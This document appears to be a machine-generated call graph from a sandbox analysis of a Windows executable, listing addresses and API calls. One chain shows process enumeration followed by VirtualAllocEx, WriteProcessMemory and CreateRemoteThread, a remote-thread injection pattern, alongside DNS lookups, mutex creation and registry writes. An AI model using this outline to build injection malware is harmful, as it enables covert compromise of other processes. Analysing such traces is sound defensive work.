17518 41b74b GetModuleFileNameA 17517->17518 17519 41b6cc 17517->17519 17521 41a600 2 API calls 17519->17521 17522 41b743 17521->17522 17522->17518 17523 41dec0 17524 41df13 shutdown 17523->17524 17525 41decc 17523->17525 17525->17525 17526 41da50 4 API calls 17525->17526 17527 41df0b 17526->17527 17527->17524 22378 4225c5 22381 42257f 22378->22381 22380 4225cd 22382 42258b ctype 22381->22382 22383 4241fb __lock 34 API calls 22382->22383 22384 42259a 22383->22384 22385 4225ac 22384->22385 22387 42275e ___free_lc_time 34 API calls 22384->22387 22389 4225bc 22385->22389 22387->22385 22388 4225b6 ctype 22388->22380 22392 424146 RtlLeaveCriticalSection 22389->22392 22391 4225c3 22391->22388 22392->22391 17529 42dcc8 17532 42275e 17529->17532 17531 42dcd1 17535 42276a ctype 17532->17535 17533 4227c9 ctype 17533->17531 17534 4227a6 17534->17533 17537 4227bb RtlFreeHeap 17534->17537 17535->17533 17535->17534 17542 4241fb 17535->17542 17537->17533 17538 422781 ___free_lc_time 17541 42279b 17538->17541 17549 424739 17538->17549 17555 4227b1 17541->17555 17543 424221 RtlEnterCriticalSection 17542->17543 17544 42420e 17542->17544 17543->17538 17558 42415b 17544->17558 17546 424214 17546->17543 17581 422c26 17546->17581 17550 424776 17549->17550 17554 424a1c ___free_lc_time 17549->17554 17551 424962 VirtualFree 17550->17551 17550->17554 17552 4249c6 17551->17552 17553 4249d5 VirtualFree HeapFree 17552->17553 17552->17554 17553->17554 17554->17541 17719 424146 RtlLeaveCriticalSection 17555->17719 17557 4227b8 17557->17534 17559 424167 ctype 17558->17559 17562 42418a ctype 17559->17562 17587 422eeb 17559->17587 17562->17546 17563 424192 17565 4241fb __lock 34 API calls 17563->17565 17564 424185 17590 426856 17564->17590 17567 424199 17565->17567 17568 4241a1 17567->17568 17569 4241d9 17567->17569 17593 427a37 17568->17593 17571 42275e ___free_lc_time 34 API calls 17569->17571 17572 4241df 17571->17572 17597 4241f2 17572->17597 17573 4241ac 17574 4241b2 17573->17574 17575 4241d5 17573->17575 17577 42275e ___free_lc_time 34 API calls 17574->17577 17575->17572 17578 4241b8 17577->17578 17579 426856 __lock 34 API calls 17578->17579 17580 4241bd __lock 17579->17580 17580->17562 17582 422c34 17581->17582 17583 422c2f 17581->17583 17664 426a34 17582->17664 17658 426bab 17583->17658 17600 422ebf 17587->17600 17636 423bdf GetLastError FlsGetValue 17590->17636 17592 42685b 17592->17562 17594 427a43 ctype 17593->17594 17595 427a79 ctype 17594->17595 17596 427a64 GetProcAddress 17594->17596 17595->17573 17596->17595 17657 424146 RtlLeaveCriticalSection 17597->17657 17599 4241f9 17599->17562 17601 422ee8 17600->17601 17603 422ec6 __getbuf 17600->17603 17601->17563 17601->17564 17603->17601 17604 422e44 17603->17604 17605 422e50 ctype 17604->17605 17606 422e83 17605->17606 17608 4241fb __lock 33 API calls 17605->17608 17607 422e9e RtlAllocateHeap 17606->17607 17609 422ead ctype 17606->17609 17607->17609 17610 422e6b 17608->17610 17609->17603 17614 424eed 17610->17614 17615 424f1f 17614->17615 17616 425042 17615->17616 17619 422e76 17615->17619 17623 424a51 17615->17623 17616->17619 17631 424b08 17616->17631 17620 422eb6 17619->17620 17635 424146 RtlLeaveCriticalSection 17620->17635 17622 422ebd 17622->17606 17624 424a63 RtlReAllocateHeap 17623->17624 17625 424a97 RtlAllocateHeap 17623->17625 17628 424a82 17624->17628 17629 424a86 17624->17629 17626 424ac2 VirtualAlloc 17625->17626 17627 424abe 17625->17627 17626->17627 17630 424adc HeapFree 17626->17630 17627->17616 17628->17616 17629->17625 17630->17627 17632 424b1d VirtualAlloc 17631->17632 17634 424b64 17632->17634 17634->17619 17635->17622 17637 423c44 SetLastError 17636->17637 17638 423bfb 17636->17638 17637->17592 17646 427472 17638->17646 17640 423c07 17641 423c0f FlsSetValue 17640->17641 17642 423c3c 17640->17642 17641->17642 17643 423c20 GetCurrentThreadId 17641->17643 17644 422c26 __lock 29 API calls 17642->17644 17643->17637 17645 423c43 17644->17645 17645->17637 17647 42747e __getbuf ___initmbctable ctype 17646->17647 17648 4274eb RtlAllocateHeap 17647->17648 17649 4241fb __lock 33 API calls 17647->17649 17650 427517 ctype 17647->17650 17651 424eed __getbuf 5 API calls 17647->17651 17653 42751c 17647->17653 17648->17647 17649->17647 17650->17640 17651->17647 17656 424146 RtlLeaveCriticalSection 17653->17656 17655 427523 17655->17647 17656->17655 17657->17599 17659 426bb5 17658->17659 17660 426a34 _fast_error_exit 34 API calls 17659->17660 17663 426be2 17659->17663 17661 426bcc 17660->17661 17662 426a34 _fast_error_exit 34 API calls 17661->17662 17662->17663 17663->17582 17665 426a5a 17664->17665 17668 426b67 _strlen 17665->17668 17669 426a99 17665->17669 17674 426b62 17665->17674 17670 426b7c GetStdHandle WriteFile 17668->17670 17671 426aa5 GetModuleFileNameA 17669->17671 17669->17674 17670->17674 17672 426abf _strcat _fast_error_exit _strncpy _strlen 17671->17672 17675 429202 17672->17675 17682 428381 17674->17682 17676 429215 LoadLibraryA 17675->17676 17679 429282 17675->17679 17677 42922a GetProcAddress 17676->17677 17676->17679 17678 429241 GetProcAddress GetProcAddress 17677->17678 17677->17679 17678->17679 17680 429264 GetProcAddress 17678->17680 17679->17674 17680->17679 17681 429275 GetProcAddress 17680->17681 17681->17679 17683 422c3d 17682->17683 17684 428350 ctype 17682->17684 17683->17543 17688 429c54 17684->17688 17689 429c63 ctype 17688->17689 17690 429cc5 GetModuleFileNameA 17689->17690 17691 429c76 17689->17691 17694 429cdf _strcat _fast_error_exit _strncpy _strlen 17690->17694 17696 42552e 17691->17696 17695 429202 _fast_error_exit 6 API calls 17694->17695 17695->17691 17699 42545a 17696->17699 17698 42553b 17700 425466 ctype 17699->17700 17701 4241fb __lock 32 API calls 17700->17701 17702 42546d 17701->17702 17703 42547e GetCurrentProcess TerminateProcess 17702->17703 17704 42548e _fast_error_exit 17702->17704 17703->17704 17709 425509 17704->17709 17707 425504 ctype 17707->17698 17710 42550e 17709->17710 17712 4254f1 17709->17712 17718 424146 RtlLeaveCriticalSection 17710->17718 17712->17707 17713 425396 17712->17713 17714 4253a1 17713->17714 17715 4253a5 GetProcAddress 17714->17715 17716 4253bb ExitProcess 17714->17716 17715->17716 17717 4253b5 17715->17717 17717->17716 17718->17712 17719->17557 17767 41c7d0 17768 41c842 RegSetValueExA 17767->17768 17769 41c7dc 17767->17769 17771 41c580 4 API calls 17769->17771 17772 41c83a 17771->17772 17772->17768 18005 4262db 18006 4262e8 18005->18006 18007 427472 __lock 34 API calls 18006->18007 18008 426302 18007->18008 18009 427472 __lock 34 API calls 18008->18009 18010 42631b 18008->18010 18009->18010 18037 4040e0 18038 404117 18037->18038 18039 41a830 2 API calls 18038->18039 18040 404149 18039->18040 18040->18040 18073 402810 18040->18073 18042 4041b0 18083 402930 18042->18083 18044 4041c9 18045 404207 18044->18045 18046 40423b 18044->18046 18047 404229 18045->18047 18101 4032c0 18045->18101 18087 41ae60 18046->18087 18051 41ae60 2 API calls 18047->18051 18053 404231 18051->18053 18052 404221 18105 403380 18052->18105 18056 4043f9 18135 41d9b0 18056->18135 18060 41a830 2 API calls 18061 404438 18060->18061 18139 402a60 18061->18139 18064 402810 39 API calls 18072 40427b 18064->18072 18066 404462 18157 4034a0 18066->18157 18069 404469 18071 41ae60 2 API calls 18069->18071 18071->18053 18072->18053 18072->18056 18072->18064 18096 41dc80 18072->18096 18108 402720 18072->18108 18122 4031c0 18072->18122 18075 40281d 18073->18075 18074 402861 18076 402872 18074->18076 18167 421b79 18074->18167 18075->18074 18080 402844 18075->18080 18077 402885 18076->18077 18163 4021e0 18076->18163 18077->18042 18081 402720 39 API calls 18080->18081 18082 40285b 18081->18082 18082->18042 18085 40293f 18083->18085 18084 402968 18084->18044 18085->18084 18206 401fc0 18085->18206 18088 41ae6c 18087->18088 18089 40424b 18087->18089 18088->18088 18090 41a600 2 API calls 18088->18090 18091 41d920 18089->18091 18090->18089 18092 41d97d DnsQuery_A 18091->18092 18093 41d92c 18091->18093 18092->18072 18228 41d870 18093->18228 18097 41dced gethostbyname 18096->18097 18098 41dc8c 18096->18098 18097->18072 18099 41da50 4 API calls 18098->18099 18100 41dce5 18099->18100 18100->18097 18104 4032d4 18101->18104 18102 4032d8 18102->18052 18104->18102 18104->18104 18239 402e10 18104->18239 18248 403110 18105->18248 18107 40339b 18107->18047 18107->18107 18109 402733 18108->18109 18110 402738 18108->18110 18111 421b39 39 API calls 18109->18111 18112 40276a 18110->18112 18113 40274b 18110->18113 18111->18110 18114 402776 18112->18114 18116 421b79 39 API calls 18112->18116 18264 402160 18113->18264 18118 4021e0 39 API calls 18114->18118 18121 402789 18114->18121 18116->18114 18117 402757 18119 402160 39 API calls 18117->18119 18118->18121 18120 402761 18119->18120 18120->18072 18121->18072 18123 403222 18122->18123 18133 4031e0 18122->18133 18124 403233 18123->18124 18127 403261 18123->18127 18268 402bd0 18124->18268 18278 402410 18127->18278 18129 403243 18129->18072 18130 4032a5 18130->18072 18131 401fc0 39 API calls 18131->18133 18132 402bd0 39 API calls 18134 403291 18132->18134 18133->18123 18133->18131 18134->18072 18136 41d9bc 18135->18136 18138 404429 18135->18138 18137 41d870 4 API calls 18136->18137 18137->18138 18138->18053 18138->18060 18140 402a80 18139->18140 18140->18140 18141 402810 39 API calls 18140->18141 18142 402a92 18141->18142 18143 403f10 18142->18143 18146 403f37 18143->18146 18144 403f60 18156 403fed 18144->18156 18283 402360 18144->18283 18146->18144 18148 401fc0 39 API calls 18146->18148 18148->18144 18156->18066 18158 4034c7 18157->18158 18159 4034ac 18157->18159 18158->18069 18160 4032c0 39 API calls 18159->18160 18161 4034bf 18160->18161 18162 403380 39 API calls 18161->18162 18162->18158 18164 402213 18163->18164 18177 421b15 18164->18177 18166 402249 18166->18077 18168 421b83 __EH_prolog 18167->18168 18169 402a60 39 API calls 18168->18169 18170 421b93 18169->18170 18201 4029a0 18170->18201 18174 421bb8 18175 422554 18174->18175 18176 42275e ___free_lc_time 34 API calls 18174->18176 18175->18076 18176->18175 18180 421b1c __getbuf 18177->18180 18178 422eeb __getbuf 34 API calls 18178->18180 18179 421b37 18179->18166 18180->18178 18180->18179 18182 421bf8 18180->18182 18183 421c39 18182->18183 18184 421c0d 18182->18184 18196 4224f6 18183->18196 18192 4224b9 18184->18192 18187 421c47 18200 42246e RaiseException 18187->18200 18188 421c29 18190 4228af 38 API calls 18188->18190 18190->18183 18191 421c58 18193 4224ce _strlen 18192->18193 18194 422eeb __getbuf 34 API calls 18193->18194 18195 4224d5 _strcat 18194->18195 18195->18188 18197 42250e _strlen 18196->18197 18199 42251d _strcat 18196->18199 18198 422eeb __getbuf 34 API calls 18197->18198 18198->18199 18199->18187 18200->18191 18202 4029c2 18201->18202 18203 402720 39 API calls 18202->18203 18204 4029eb 18203->18204 18205 42246e RaiseException 18204->18205 18205->18174 18207 401fd3 18206->18207 18208 401fce 18206->18208 18207->18084 18210 421b39 18208->18210 18211 421b43 __EH_prolog 18210->18211 18212 402a60 39 API calls 18211->18212 18213 421b53 18212->18213 18214 4029a0 39 API calls 18213->18214 18215 421b63 18214->18215 18226 42246e RaiseException 18215->18226 18217 421b78 __EH_prolog 18218 402a60 39 API calls 18217->18218 18219 421b93 18218->18219 18220 4029a0 39 API calls 18219->18220 18221 421ba3 18220->18221 18227 42246e RaiseException 18221->18227 18223 422554 18223->18207 18224 421bb8 18224->18223 18225 42275e ___free_lc_time 34 API calls 18224->18225 18225->18223 18226->18217 18227->18224 18229 41d8e7 GetProcAddress 18228->18229 18231 41d87c 18228->18231 18230 41d90a 18229->18230 18232 41d8fa 18229->18232 18230->18092 18231->18231 18233 41d8be LoadLibraryA 18231->18233 18232->18230 18234 41a720 2 API calls 18232->18234 18233->18229 18235 41d8d1 18233->18235 18234->18230 18235->18229 18236 41d8db 18235->18236 18237 41a720 2 API calls 18236->18237 18238 41d8e2 18237->18238 18238->18229 18240 402e3b 18239->18240 18246 402e87 18239->18246 18241 402810 39 API calls 18240->18241 18242 402e5e 18241->18242 18243 4029a0 39 API calls 18242->18243 18244 402e70 18243->18244 18247 42246e RaiseException 18244->18247 18246->18104 18247->18246 18249 40318f 18248->18249 18250 403146 18248->18250 18249->18107 18256 402b00 18250->18256 18253 403110 39 API calls 18254 403181 18253->18254 18255 403110 39 API calls 18254->18255 18255->18249 18257 421b15 39 API calls 18256->18257 18258 402b28 18257->18258 18259 402b5d 18258->18259 18261 402aa0 18258->18261 18259->18253 18262 402720 39 API calls 18261->18262 18263 402ae2 18262->18263 18263->18259 18265 40216e 18264->18265 18267 402173 ___free_lc_time 18264->18267 18266 421b39 39 API calls 18265->18266 18266->18267 18267->18117 18269 402c41 18268->18269 18270 402bf5 18268->18270 18272 402b00 39 API calls 18269->18272 18271 402810 39 API calls 18270->18271 18273 402c18 18271->18273 18277 402c5a 18272->18277 18274 4029a0 39 API calls 18273->18274 18275 402c2a 18274->18275 18282 42246e RaiseException 18275->18282 18277->18129 18279 402444 18278->18279 18280 402421 18278->18280 18279->18130 18279->18132 18280->18279 18281 401fc0 39 API calls 18280->18281 18281->18279 18282->18269 18284 421b15 39 API calls 18283->18284 18285 402367 18284->18285 18286 403610 18285->18286 18287 402720 39 API calls 18286->18287 18288 40364d 18287->18288 18339 403410 18288->18339 18340 402360 39 API calls 18339->18340 18341 40343b 18340->18341 18342 403380 39 API calls 18341->18342 18947 4285ef 18948 428620 18947->18948 18961 428619 18947->18961 18949 42864a 18948->18949 18950 42865c 18948->18950 18952 429d9c _write_multi_char 36 API calls 18949->18952 18953 428737 WriteFile 18950->18953 18954 42866a 18950->18954 18951 428381 _fast_error_exit 34 API calls 18955 4287b5 18951->18955 18956 428659 18952->18956 18958 42870b 18953->18958 18959 42875f GetLastError 18953->18959 18957 428775 18954->18957 18963 4286c0 WriteFile 18954->18963 18956->18950 18960 42878d 18957->18960 18957->18961 18958->18957 18958->18961 18965 42871b 18958->18965 18959->18958 18962 426856 __lock 34 API calls 18960->18962 18961->18951 18966 428792 18962->18966 18964 428700 GetLastError 18963->18964 18967 4286e1 18963->18967 18968 4286fe 18964->18968 18969 428723 18965->18969 18970 42876a 18965->18970 18971 42685f _write_multi_char 34 API calls 18966->18971 18967->18954 18967->18968 18968->18958 18973 426856 __lock 34 API calls 18969->18973 18972 426868 _write_multi_char 34 API calls 18970->18972 18971->18961 18972->18961 18974 428728 18973->18974 18975 42685f _write_multi_char 34 API calls 18974->18975 18975->18961 18976 40acf0 18977 402360 39 API calls 18976->18977 18978 40ad1f 18977->18978 18991 4076b0 18978->18991 18981 4076b0 39 API calls 18982 40ad5f 18981->18982 18983 4076b0 39 API calls 18982->18983 18984 40ad74 18983->18984 18994 41add0 18984->18994 18986 40ad97 19000 408070 18986->19000 18992 421b15 39 API calls 18991->18992 18993 4076b7 18992->18993 18993->18981 18995 41ae3b CreateMutexA 18994->18995 18996 41addc 18994->18996 18995->18986 18998 41a600 2 API calls 18996->18998 18999 41ae33 18998->18999 18999->18995 19001 4080f3 19000->19001 19021 41ba80 19001->19021 19003 40811a 19003->19003 19004 402810 39 API calls 19003->19004 19005 408138 19004->19005 19006 40a890 19005->19006 19007 40a8bc 19006->19007 19027 41b2d0 19007->19027 19009 40aa7c 19011 40aa76 19012 41a8e0 3 API calls 19011->19012 19012->19009 19013 41b3f0 LoadLibraryA GetProcAddress ReadFile 19018 40a8d9 19013->19018 19014 421b15 39 API calls 19014->19018 19015 402a60 39 API calls 19015->19018 19018->19009 19018->19011 19018->19013 19018->19014 19018->19015 19020 4083a0 39 API calls 19018->19020 19033 41c090 19018->19033 19039 407a50 19018->19039 19043 407b70 19018->19043 19047 40a7d0 19018->19047 19020->19018 19022 41ba90 19021->19022 19023 41bb2b 19021->19023 19025 41a600 2 API calls 19022->19025 19023->19003 19026 41bb23 19025->19026 19026->19023 19028 41b333 CreateFileA 19027->19028 19029 41b2dc 19027->19029 19028->19018 19031 41a600 2 API calls 19029->19031 19032 41b32b 19031->19032 19032->19028 19034 41c102 SetFilePointer 19033->19034 19035 41c09c 19033->19035 19034->19018 19037 41a600 2 API calls 19035->19037 19038 41c0fa 19037->19038 19038->19034 19041 407a5f 19039->19041 19040 407a88 19040->19018 19041->19040 19042 401fc0 39 API calls 19041->19042 19042->19040 19044 407b80 19043->19044 19044->19044 19045 402810 39 API calls 19044->19045 19046 407b90 19045->19046 19046->19018 19049 40a7f8 19047->19049 19048 40a822 19050 402720 39 API calls 19048->19050 19054 40a85d 19048->19054 19049->19048 19052 401fc0 39 API calls 19049->19052 19051 40a843 19050->19051 19055 40a600 19051->19055 19052->19048 19054->19018 19056 40a60e 19055->19056 19057 40a62f 19055->19057 19100 4083e0 19056->19100 19059 40a672 19057->19059 19060 40a644 19057->19060 19062 40a676 19059->19062 19063 40a6ad 19059->19063 19061 4023d0 39 API calls 19060->19061 19065 40a64e 19061->19065 19066 4023d0 39 API calls 19062->19066 19067 4023d0 39 API calls 19063->19067 19064 40a625 19064->19054 19068 40a656 19065->19068 19069 40a788 19065->19069 19070 40a683 19066->19070 19075 40a6b7 19067->19075 19071 4083e0 39 API calls 19068->19071 19110 4086a0 19069->19110 19070->19069 19072 40a68b 19070->19072 19076 40a666 19071->19076 19077 4083e0 39 API calls 19072->19077 19074 40a717 19078 4023d0 39 API calls 19074->19078 19075->19074 19081 4023d0 39 API calls 19075->19081 19076->19054 19080 40a6a1 19077->19080 19083 40a723 19078->19083 19079 40a795 19079->19054 19080->19054 19082 40a6d8 19081->19082 19082->19074 19084 40a6dc 19082->19084 19083->19069 19085 40a74d 19083->19085 19088 4023d0 39 API calls 19083->19088 19086 40a702 19084->19086 19087 40a6ed 19084->19087 19089 40a773 19085->19089 19090 40a75e 19085->19090 19092 4083e0 39 API calls 19086->19092 19091 4083e0 39 API calls 19087->19091 19093 40a749 19088->19093 19096 4083e0 39 API calls 19089->19096 19094 4083e0 39 API calls 19090->19094 19095 40a6f6 19091->19095 19097 40a70b 19092->19097 19093->19069 19093->19085 19095->19054 19097->19054 19101 408451 19100->19101 19102 408405 19100->19102 19122 408200 19101->19122 19103 402810 39 API calls 19102->19103 19105 408428 19103->19105 19106 4029a0 39 API calls 19105->19106 19107 40843a 19106->19107 19121 42246e RaiseException 19107->19121 19108 40846a 19108->19064 19111 4086c8 19110->19111 19112 40877c 19111->19112 19114 4087a0 19111->19114 19113 4083e0 39 API calls 19112->19113 19115 40878a 19113->19115 19116 401fc0 39 API calls 19114->19116 19115->19079 19117 4087ce 19116->19117 19118 4087fd 19117->19118 19119 4083e0 39 API calls 19117->19119 19118->19079 19121->19101 19123 421b15 39 API calls 19122->19123 19124 408228 19123->19124 19125 40825d 19124->19125 19127 407f60 19124->19127 19125->19108 19128 402720 39 API calls 19127->19128 19129 407f9e 19128->19129 19129->19125 19130 41b4f0 19131 41b500 19130->19131 19132 41b59b CreateToolhelp32Snapshot 19130->19132 19134 41a600 2 API calls 19131->19134 19135 41b593 19134->19135 19135->19132 21043 413cf7 21044 413d01 21043->21044 21061 4121f0 21044->21061 21046 413d16 21072 412e80 21046->21072 21062 412270 21061->21062 21063 41ba80 2 API calls 21062->21063 21064 41229c 21063->21064 21065 41b2d0 3 API calls 21064->21065 21066 4122b5 21065->21066 21067 4122bc 21066->21067 21068 41b3f0 3 API calls 21066->21068 21067->21046 21069 4122da 21068->21069 21070 41a8e0 3 API calls 21069->21070 21071 4122e0 21070->21071 21071->21046 21190 420d70 21072->21190 21076 412e8f 21077 41a960 2 API calls 21076->21077 21078 41eca0 21077->21078 21079 41a960 2 API calls 21078->21079 21080 41ecb1 21079->21080 21081 41a960 2 API calls 21080->21081 21082 41ecbf 21081->21082 21083 41a960 2 API calls 21082->21083 21084 41eccd 21083->21084 21085 41a960 2 API calls 21084->21085 21191 41b810 2 API calls 21190->21191 21192 420d8a 21191->21192 21193 41b770 3 API calls 21192->21193 21194 420e29 21193->21194 21196 420e47 21194->21196 21228 4209e0 21194->21228 21197 41b770 3 API calls 21196->21197 21198 420ee9 21197->21198 21199 4209e0 7 API calls 21198->21199 21200 420f07 21198->21200 21199->21200 21201 41b770 3 API calls 21200->21201 21202 420fa9 21201->21202 21203 420fc7 21202->21203 21204 4209e0 7 API calls 21202->21204 21250 420ac0 21203->21250 21204->21203 21206 412e85 21207 420970 21206->21207 21208 420984 21207->21208 21209 42097d 21207->21209 21210 41f4c0 12 API calls 21208->21210 21209->21076 21211 42098c 21210->21211 21212 41f760 12 API calls 21211->21212 21213 420995 21212->21213 21214 41fb20 6 API calls 21213->21214 21215 42099e 21214->21215 21216 41fc20 12 API calls 21215->21216 21217 4209a7 21216->21217 21218 420220 11 API calls 21217->21218 21219 4209b0 21218->21219 21229 41ac50 2 API calls 21228->21229 21230 4209ef 21229->21230 21231 41acd0 3 API calls 21230->21231 21233 4209f5 21231->21233 21232 4209fb 21232->21196 21233->21232 21234 41b2d0 3 API calls 21233->21234 21235 420a48 21234->21235 21236 420a64 21235->21236 21237 420a4f 21235->21237 21239 41b470 3 API calls 21236->21239 21238 41ac50 2 API calls 21237->21238 21240 420a57 21238->21240 21241 420a8f 21239->21241 21242 41ad50 3 API calls 21240->21242 21243 41ac50 2 API calls 21241->21243 21244 420a5d 21242->21244 21245 420aad 21243->21245 21244->21196 21246 41ad50 3 API calls 21245->21246 21247 420ab3 21246->21247 21248 41a8e0 3 API calls 21247->21248 21249 420ab9 21248->21249 21249->21196 21251 420b10 21250->21251 21252 41c690 5 API calls 21251->21252 21253 420cab 21252->21253 21254 420ce8 21253->21254 21255 41c720 5 API calls 21253->21255 21254->21206 21256 420cda 21255->21256 21257 420cde 21256->21257 21259 420cf3 21256->21259 21258 41c870 5 API calls 21257->21258 21258->21254 21264 41c7d0 21259->21264 21261 420d54 21262 41c870 5 API calls 21261->21262 21263 420d64 21262->21263 21263->21206 21265 41c842 RegSetValueExA 21264->21265 21266 41c7dc 21264->21266 21265->21261 21268 41c580 4 API calls 21266->21268 21269 41c83a 21268->21269 21269->21265 21331 42adf5 21356 42b80d 21331->21356 21333 42ae04 21334 42ae2a 21333->21334 21336 422b8b 64 API calls 21333->21336 21379 422b8b 21334->21379 21337 42ae3a 21336->21337 21338 42ae52 21337->21338 21339 42ae40 21337->21339 21340 422b8b 64 API calls 21338->21340 21343 422ade 47 API calls 21339->21343 21344 42ae2f 21340->21344 21341 42ae91 21345 42275e ___free_lc_time 34 API calls 21341->21345 21342 42ae9c 21346 422eeb __getbuf 34 API calls 21342->21346 21343->21334 21344->21341 21344->21342 21355 42ae97 21345->21355 21347 42aeb0 21346->21347 21348 42b7ca 46 API calls 21347->21348 21349 42aebc 21348->21349 21350 42b7bd 40 API calls 21349->21350 21351 42aec2 21350->21351 21352 42b7ca 46 API calls 21351->21352 21353 42aecd 21352->21353 21359 42b340 21353->21359 21357 422eeb __getbuf 34 API calls 21356->21357 21358 42b817 ___initmbctable 21357->21358 21358->21333 21360 422eeb __getbuf 34 API calls 21359->21360 21361 42b34d 21360->21361 21382 42afe4 21361->21382 21364 42b7ca 46 API calls 21365 42b364 21364->21365 21366 42b78b 44 API calls 21365->21366 21367 42b375 21366->21367 21368 42b37d 21367->21368 21370 42b396 21367->21370 21369 42275e ___free_lc_time 34 API calls 21368->21369 21375 42b383 21369->21375 21371 42275e ___free_lc_time 34 API calls 21370->21371 21372 42b430 21371->21372 21373 42b7ca 46 API calls 21372->21373 21374 42b455 21373->21374 21374->21375 21392 42b2b5 21374->21392 21375->21355 21414 422b2f 21379->21414 21381 422b9a 21381->21344 21383 422eeb __getbuf 34 API calls 21382->21383 21389 42b002 21383->21389 21384 42b0a0 21385 42275e ___free_lc_time 34 API calls 21384->21385 21386 42b0a8 21385->21386 21386->21364 21387 42b7ca 46 API calls 21387->21389 21388 42b78b 44 API calls 21388->21389 21389->21384 21389->21387 21389->21388 21390 42b0bb 21389->21390 21391 42275e ___free_lc_time 34 API calls 21390->21391 21391->21386 21393 42b7ca 46 API calls 21392->21393 21394 42b2ca 21393->21394 21395 42b80d 34 API calls 21394->21395 21398 42b2dd 21395->21398 21415 422b3b ctype 21414->21415 21425 4268db 21415->21425 21417 422b40 21418 422b56 21417->21418 21419 422b47 21417->21419 21445 4266ee 21418->21445 21420 426856 __lock 34 API calls 21419->21420 21424 422b4c ctype 21420->21424 21424->21381 21426 4268e7 ctype 21425->21426 21427 4241fb __lock 34 API calls 21426->21427 21434 4268f5 21427->21434 21428 426962 21452 4269f4 21428->21452 21429 426966 21431 422eeb __getbuf 34 API calls 21429->21431 21433 426970 21431->21433 21432 4269e9 ctype 21432->21417 21433->21428 21435 426986 21433->21435 21434->21428 21434->21429 21438 42415b __lock 34 API calls 21434->21438 21455 4263c7 21434->21455 21460 426419 21434->21460 21437 427a37 __lock GetProcAddress 21435->21437 21439 426994 21437->21439 21438->21434 21441 4269b2 RtlEnterCriticalSection 21439->21441 21442 42699f 21439->21442 21441->21428 21443 42275e ___free_lc_time 34 API calls 21442->21443 21444 4269a7 21443->21444 21444->21428 21448 42670d 21445->21448 21446 422b69 21449 422b81 21446->21449 21448->21446 21467 4291ad 21448->21467 21450 4263ea 2 API calls 21449->21450 21451 422b89 21450->21451 21451->21424 21465 424146 RtlLeaveCriticalSection 21452->21465 21454 4269fb 21454->21432 21456 4263d0 21455->21456 21457 4263db RtlEnterCriticalSection 21455->21457 21458 4241fb __lock 34 API calls 21456->21458 21457->21434 21459 4263d9 21458->21459 21459->21434 21461 426422 21460->21461 21462 42642d RtlLeaveCriticalSection 21460->21462 21466 424146 RtlLeaveCriticalSection 21461->21466 21462->21434 21464 42642b 21464->21434 21465->21454 21466->21464 21468 4291b9 ctype 21467->21468 21473 428ec6 21468->21473 21472 4291e9 ctype 21472->21446 21475 428ee1 21473->21475 21474 428f4d 21476 426856 __lock 34 API calls 21474->21476 21475->21474 21479 428f67 21475->21479 21477 428f52 21476->21477 21478 42685f _write_multi_char 34 API calls 21477->21478 21497 428f5d 21478->21497 21480 428fda 21479->21480 21483 428fb1 21479->21483 21481 426856 __lock 34 API calls 21480->21481 21482 428fdf 21481->21482 21484 42685f _write_multi_char 34 API calls 21482->21484 21518 428bf3 21483->21518 21484->21497 21486 42905f 21487 429082 CreateFileA 21486->21487 21488 429068 21486->21488 21489 4290c1 GetLastError 21487->21489 21490 4290af GetFileType 21487->21490 21491 426856 __lock 34 API calls 21488->21491 21494 426868 _write_multi_char 34 API calls 21489->21494 21492 4290d0 21490->21492 21493 4290ba CloseHandle 21490->21493 21495 42906d 21491->21495 21538 4289f5 21492->21538 21493->21489 21494->21497 21496 42685f _write_multi_char 34 API calls 21495->21496 21496->21497 21514 4291f2 21497->21514 21515 429200 21514->21515 21516 4291f8 21514->21516 21515->21472 21555 428bd1 RtlLeaveCriticalSection 21516->21555 21519 428bff ctype 21518->21519 21520 42415b __lock 34 API calls 21519->21520 21521 428c0a 21520->21521 21522 4241fb __lock 34 API calls 21521->21522 21523 428c94 ctype 21521->21523 21532 428c1a 21522->21532 21523->21486 21524 428d4b 21550 428d66 21524->21550 21525 428cfd 21527 422eeb __getbuf 34 API calls 21525->21527 21531 428d08 21527->21531 21528 428ca7 RtlEnterCriticalSection 21529 428cb7 RtlLeaveCriticalSection 21528->21529 21528->21532 21529->21532 21530 4241fb __lock 34 API calls 21530->21532 21531->21524 21533 428b31 _write_multi_char 35 API calls 21531->21533 21532->21524 21532->21525 21532->21528 21532->21530 21534 428c73 21532->21534 21547 428ccc 21532->21547 21533->21524 21534->21532 21536 427a37 __lock GetProcAddress 21534->21536 21537 428c87 __lock 21534->21537 21536->21534 21537->21523 21539 428a03 21538->21539 21540 428a58 21538->21540 21539->21540 21546 428a22 21539->21546 21541 426856 __lock 34 API calls 21540->21541 21542 428a5d 21541->21542 21544 42685f _write_multi_char 34 API calls 21542->21544 21543 428a4e 21543->21497 21544->21543 21545 428a48 SetStdHandle 21545->21543 21546->21543 21546->21545 21553 424146 RtlLeaveCriticalSection 21547->21553 21549 428cd3 21549->21528 21554 424146 RtlLeaveCriticalSection 21550->21554 21552 428d6d 21552->21523 21553->21549 21554->21552 21555->21515 21556 4054f8 21559 4054d1 21556->21559 21558 40556b 21560 41a8e0 3 API calls 21558->21560 21559->21556 21559->21558 21563 404920 21559->21563 21581 41b640 21559->21581 21562 405575 21560->21562 21587 41b120 21563->21587 21566 404a70 21566->21559 21567 404945 lstrlen 21591 41bc70 21567->21591 21569 404964 21570 404a5d 21569->21570 21597 41bd10 21569->21597 21571 41a8e0 3 API calls 21570->21571 21573 404a63 21571->21573 21573->21559 21574 40497b 21574->21570 21603 41bdc0 21574->21603 21576 404a2b GetProcAddress 21576->21570 21577 404a37 21576->21577 21607 41be50 21577->21607 21579 404a4b 21579->21570 21580 41a8e0 3 API calls 21579->21580 21580->21570 21582 41b64c 21581->21582 21583 41b6ae Process32Next 21581->21583 21585 41a600 2 API calls 21582->21585 21583->21559 21586 41b6a6 21585->21586 21586->21583 21588 40493b 21587->21588 21589 41b12c 21587->21589 21588->21566 21588->21567 21590 41a600 2 API calls 21589->21590 21590->21588 21592 41bce2 VirtualAllocEx 21591->21592 21593 41bc7c 21591->21593 21592->21569 21595 41a600 2 API calls 21593->21595 21596 41bcda 21595->21596 21596->21592 21598 41bd9b WriteProcessMemory 21597->21598 21599 41bd1c 21597->21599 21598->21574 21601 41a600 2 API calls 21599->21601 21602 41bd93 21601->21602 21602->21598 21604 41bdcc 21603->21604 21605 41be34 21603->21605 21604->21604 21606 41a600 2 API calls 21604->21606 21605->21576 21606->21605 21608 41bedb CreateRemoteThread 21607->21608 21609 41be5c 21607->21609 21608->21579 21611 41a600 2 API calls 21609->21611 21612 41bed3 21611->21612 21612->21608 23562 